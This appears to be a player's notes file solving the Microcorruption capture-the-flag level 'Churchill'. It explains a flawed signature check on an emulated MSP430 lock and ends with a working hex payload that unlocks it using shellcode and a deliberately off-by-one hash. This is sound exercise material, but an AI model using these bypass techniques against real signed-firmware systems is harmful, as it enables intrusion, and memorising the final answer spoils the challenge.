MicroCorruption/22-Churchill/notes.md

42 lines
1.5 KiB
Markdown
Raw Permalink Normal View History

2022-12-12 03:03:53 +00:00
Churchill seems to not verify after 0xff bytes?
## Sample input
```hex
8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e
```
## Layout:
Loadaddr | Signature Type | length | payload | Signature
---------|----------------|--------|----------|----------
8000 | 00 (ed25519) | 06 | 3041 ret | c26436...
8000 | 01 (sha512) | 12 | 324000ffb0121000 | f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5
```c
324000ff mov #ff00, sr
b0121000 call #0010
```
## Payload
8000 01 0c 3240 00ff b012 1000
Hash:
80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
complete payload:
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
# THE TWIST
The program explicitly checks for `0x1` when evaluating the results of a hash
For perfectly identical strings, this DOESN'T WORK, because, memcmp returns `0`.
Solution: subtract 1 from the last byte of payload_signature. It'll be off by one, and when the program evaluates it, it'll end up with 0x0001 in r15
# Final Answer:
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb